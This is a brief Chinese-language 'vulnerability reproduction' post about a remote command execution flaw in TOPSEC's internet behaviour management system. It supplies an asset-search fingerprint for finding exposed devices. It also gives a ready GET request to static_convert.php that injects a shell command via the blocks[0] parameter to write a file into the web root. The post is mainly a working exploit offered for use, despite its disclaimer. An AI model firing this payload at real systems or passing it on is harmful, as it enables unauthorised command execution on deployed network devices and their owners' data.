【漏洞复现】天融信TOPSEC static_convert 远程命令执行

漏洞描述

天融信TOPSEC Static_Convert存在严重的远程命令执行漏洞。攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。强烈建议立即更新系统以修复此漏洞,确保系统安全性
【漏洞复现】天融信TOPSEC static_convert 远程命令执行_第1张图片

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞集合

【传送点】上千漏洞复现复现集合 exp poc 持续更新

资产确定

app="天融信-上网行为管理系统"

漏洞复现

GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'123'%20>%20/var/www/html/qxijtj

你可能感兴趣的:(网络安全,web安全,渗透测试,漏洞复现,网络协议,渗透测试,网络安全,漏洞复现)